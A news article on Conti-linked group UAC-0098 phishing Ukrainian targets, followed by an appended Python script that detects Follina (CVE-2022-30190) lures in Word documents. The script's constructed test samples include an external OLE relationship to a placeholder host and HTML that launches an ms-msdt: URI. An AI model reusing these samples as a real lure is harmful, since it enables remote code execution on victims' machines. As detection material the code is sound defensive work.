Ukraine is attacked with hacking tools repurposed from the Conti cybercrime group


Financially motivated hackers linked to the notorious cybercrime group Conti are reallocating their resources for use against targets in Ukraine, indicating that the threat actor's activities align closely with the Kremlin's invasion of its neighbor, a Google researcher reported on Wednesday.

Since April, a threat group tracked as UAC-0098 has carried out a series of attacks targeting hotels, non-governmental organizations and other targets in Ukraine, as CERT-UA has previously reported. Some UAC-0098 members are former Conti members who are now turning their sophisticated techniques on Ukraine as it continues to repel the Russian invasion, said Pierre-Marc Bureau, a researcher with Google's Threat Analysis Group (TAG).

An unprecedented shift

"The attacker has recently focused on Ukrainian organizations, the Ukrainian government, and European humanitarian and nonprofit organizations," Bureau wrote. "TAG assesses that UAC-0098 acted as an initial access broker for various ransomware groups, including Quantum and Conti, a Russian cybercrime gang known as FIN12/WIZARD SPIDER."

He wrote that "UAC-0098 activities are representative examples of blurred lines between financially motivated and government-backed groups in Eastern Europe, illustrating a tendency for threat actors to alter their targeting to align with regional geopolitical interests."

In June, IBM Security X-Force researchers reported much the same thing. They revealed that the Russia-based Trickbot group, which AdvIntel researchers say was effectively taken over by Conti earlier this year, had "systematically attacked Ukraine since the Russian invasion - an unprecedented shift as the group had not targeted Ukraine before."

The "Conti campaigns against Ukraine are notable because of the extent to which this activity differs from historical precedents and the fact that these campaigns seemed specifically aimed at Ukraine with certain payloads that suggest a higher degree of target selection," IBM Security X-Force researchers wrote in July.

Reports from Google TAG and IBM Security X-Force cite a series of incidents. Those listed by TAG include:

- In late April, an email phishing campaign delivered AnchorMail (referred to as "LackeyBuilder"). The campaign used lures with subjects such as "'Active Citizen' Project" and "File_change,_booking".
- A month later, a phishing campaign targeted organizations in the hospitality industry. The emails impersonated the National Cyber Police of Ukraine and attempted to infect targets with IcedID malware.
- A separate phishing campaign targeted the hospitality industry and an NGO based in Italy. It used a compromised account belonging to a hotel in India to deceive its targets.
- A phishing campaign impersonated Elon Musk and his satellite company StarLink in an effort to get targets in Ukraine's technology, retail and government sectors to install malware.
- A campaign of more than 10,000 spam messages impersonated the National Tax Service of Ukraine. The emails carried a ZIP attachment whose contents exploited CVE-2022-30190, a critical vulnerability known as Follina. TAG succeeded in disrupting the campaign.

The findings from Google TAG and IBM Security X-Force follow leaked documents earlier this year showing that some Conti members have ties to the Kremlin.
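The Follina item is the one concrete technical detail in the list above, so here is an added triage check for it. This is example code written for this page, not code from the article, Google TAG or IBM X-Force. CVE-2022-30190 lures are Office documents whose relationship part declares an OLE object with an external target, so that Word fetches attacker-controlled HTML; that HTML then navigates to an ms-msdt: URI to launch the Windows diagnostic tool. The script unpacks a .docx and flags both indicators. The sample package, its hostname and the HTML snippet are all constructed placeholders.

```python
"""Static triage for Office documents suspected of carrying CVE-2022-30190 (Follina).

Added example for this page; not code from the article, Google TAG or IBM X-Force.
Follina lures declare an OLE object whose relationship target lies *outside*
the package (TargetMode="External") so that Word fetches attacker HTML, and that
HTML then navigates to an ms-msdt: URI to launch the Windows diagnostic tool.
The sample package below is constructed in memory; its hostname is a placeholder.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
)
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return targets of OLE-object relationships that point outside the package.

    A legitimate embedded object is stored inside the zip and carries no
    TargetMode attribute; an External target is the Follina delivery hook.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append(rel.get("Target", ""))
    return hits


def html_invokes_msdt(html: str) -> bool:
    """True if fetched second-stage HTML tries to hand Office an ms-msdt: URI."""
    return MSDT_URI.search(html) is not None


def triage(docx_bytes: bytes, fetched_html: str = "") -> dict:
    """Combine both indicators into a verdict a mail gateway could act on."""
    targets = external_ole_targets(docx_bytes)
    msdt = html_invokes_msdt(fetched_html)
    return {
        "external_ole_targets": targets,
        "msdt_in_html": msdt,
        "suspicious": bool(targets) or msdt,
    }


def build_docx(rels_xml: str) -> bytes:
    """Assemble only the package parts this check reads (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one benign (embedded image), one Follina-style.
BENIGN_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Target="media/image1.png" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/>'
    "</Relationships>"
)
FOLLINA_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" TargetMode="External" '
    'Target="http://lure.example.invalid/stage.html!" '  # placeholder host
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"/>'
    "</Relationships>"
)
# Constructed stand-in for the second-stage HTML a lure would fetch.
STAGE_HTML = '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param CONSTRUCTED"</script>'

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("follina", FOLLINA_RELS)):
        print(label, triage(build_docx(rels)))
    print("stage html", html_invokes_msdt(STAGE_HTML))
```

The relationship check is the one worth running at the gateway, since it works on the attachment alone without fetching anything; the ms-msdt: check only applies once the second-stage HTML is in hand (from a sandbox or proxy log). Extracting the document from the ZIP wrapper the campaign used is a one-line addition with the same zipfile module.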
